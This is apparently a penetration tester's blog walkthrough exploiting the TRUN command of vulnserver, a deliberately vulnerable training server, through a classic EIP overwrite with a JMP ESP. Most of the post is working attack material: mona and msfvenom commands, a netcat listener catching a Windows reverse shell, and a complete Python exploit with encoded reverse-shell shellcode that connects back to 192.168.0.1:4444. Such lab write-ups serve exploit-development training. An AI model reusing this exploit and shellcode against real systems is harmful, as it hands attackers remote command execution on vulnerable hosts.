This post will be a little shorter, but I wanted to finish up my vulnserver TRUN exploit paths.
Vulnserver TRUN – Introduction
If you haven’t read my previous write-up on the “TRUN” command, then I suggest you start with that one.
This exploit will pick up somewhere in the middle of the last one, with a different exploit path.
In this case, I will go with the standard vanilla EIP overwrite with a JMP ESP. For another example, you can visit the following write-up.
Finding the Jump
First, I started by taking a look at the modules again.
In this case, I decided to use the essfunc.dll, as I would not need to worry about null bytes.
Next, I used mona to search for a JMP ESP in the library.
!mona find -s "\xff\xe4" -m essfunc.dll (ff e4 = JMP ESP)
Verifying the Jump
I selected one of the instructions randomly (0x625011af), and updated my payload.
buffer += "\x90" * 2001 # 0x625011af = JMP ESP buffer += "\xaf\x11\x50\x62" buffer += "\xcc" * (5000 - len(buffer))
As you can see, the breakpoint was hit as expected.
Additionally, the stack has my interrupts, so the exploit can now be finished!
With my skeleton in place, I generated some reverse shellcode to connect back to me.
[email protected]:~/vulnserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -b "\x00" -f py [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 (iteration=0) x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of py file: 1684 bytes
Once I added the new shellcode to my exploit, I resent the full payload.
[email protected]:~/vulnserver# python trun_eip_reverse.py Welcome to Vulnerable Server! Enter HELP for help. [+] Sending exploit...
As you can see, I was able to catch the reverse shell and complete the exploit!
[email protected]:~/vulnserver# nc -lvp 4444 listening on [any] 4444 ... 192.168.0.2: inverse host lookup failed: Unknown host connect to [192.168.0.1] from (UNKNOWN) [192.168.0.2] 49158 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\IEUser\Downloads\vulnserver-master> whoami whoami ie8win7\ieuser C:\Users\IEUser\Downloads\vulnserver-master>
Additionally, the server was not crashing at all, as seen in the following screenshot.
Here is the final exploit that I used for my reverse shell.
#!/usr/bin/python import socket import os import sys host = "192.168.0.2" port = 9999 buf = "" buf += "\xbe\x97\x7c\x63\x8e\xdb\xc8\xd9\x74\x24\xf4\x5f\x2b" buf += "\xc9\xb1\x52\x31\x77\x12\x83\xef\xfc\x03\xe0\x72\x81" buf += "\x7b\xf2\x63\xc7\x84\x0a\x74\xa8\x0d\xef\x45\xe8\x6a" buf += "\x64\xf5\xd8\xf9\x28\xfa\x93\xac\xd8\x89\xd6\x78\xef" buf += "\x3a\x5c\x5f\xde\xbb\xcd\xa3\x41\x38\x0c\xf0\xa1\x01" buf += "\xdf\x05\xa0\x46\x02\xe7\xf0\x1f\x48\x5a\xe4\x14\x04" buf += "\x67\x8f\x67\x88\xef\x6c\x3f\xab\xde\x23\x4b\xf2\xc0" buf += "\xc2\x98\x8e\x48\xdc\xfd\xab\x03\x57\x35\x47\x92\xb1" buf += "\x07\xa8\x39\xfc\xa7\x5b\x43\x39\x0f\x84\x36\x33\x73" buf += "\x39\x41\x80\x09\xe5\xc4\x12\xa9\x6e\x7e\xfe\x4b\xa2" buf += "\x19\x75\x47\x0f\x6d\xd1\x44\x8e\xa2\x6a\x70\x1b\x45" buf += "\xbc\xf0\x5f\x62\x18\x58\x3b\x0b\x39\x04\xea\x34\x59" buf += "\xe7\x53\x91\x12\x0a\x87\xa8\x79\x43\x64\x81\x81\x93" buf += "\xe2\x92\xf2\xa1\xad\x08\x9c\x89\x26\x97\x5b\xed\x1c" buf += "\x6f\xf3\x10\x9f\x90\xda\xd6\xcb\xc0\x74\xfe\x73\x8b" buf += "\x84\xff\xa1\x1c\xd4\xaf\x19\xdd\x84\x0f\xca\xb5\xce" buf += "\x9f\x35\xa5\xf1\x75\x5e\x4c\x08\x1e\xa1\x39\x12\xdf" buf += "\x49\x38\x12\xce\xd5\xb5\xf4\x9a\xf5\x93\xaf\x32\x6f" buf += "\xbe\x3b\xa2\x70\x14\x46\xe4\xfb\x9b\xb7\xab\x0b\xd1" buf += "\xab\x5c\xfc\xac\x91\xcb\x03\x1b\xbd\x90\x96\xc0\x3d" buf += "\xde\x8a\x5e\x6a\xb7\x7d\x97\xfe\x25\x27\x01\x1c\xb4" buf += "\xb1\x6a\xa4\x63\x02\x74\x25\xe1\x3e\x52\x35\x3f\xbe" buf += "\xde\x61\xef\xe9\x88\xdf\x49\x40\x7b\x89\x03\x3f\xd5" buf += "\x5d\xd5\x73\xe6\x1b\xda\x59\x90\xc3\x6b\x34\xe5\xfc" buf += "\x44\xd0\xe1\x85\xb8\x40\x0d\x5c\x79\x70\x44\xfc\x28" buf += "\x19\x01\x95\x68\x44\xb2\x40\xae\x71\x31\x60\x4f\x86" buf += "\x29\x01\x4a\xc2\xed\xfa\x26\x5b\x98\xfc\x95\x5c\x89" buffer = "\x90" * 2001 # 0x625011af = JMP ESP buffer += "\xaf\x11\x50\x62" buffer += "\x90" * 16 buffer += buf buffer += "\x90" * (5000 - len(buffer)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) print s.recv(1024) print "[+] Sending exploit..." s.send("TRUN /.../" + buffer) print s.recv(1024) s.close()
Vulnserver TRUN – Conclusion
This finishes up the TRUN command, although this exploit was obviously easier than the last one.
I’m hoping to finish up the rest of the commands soon, but that might have to wait for some other posts.
You can find the final exploit in my GitHub repository, but let me know if you think there is anything that I should add.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.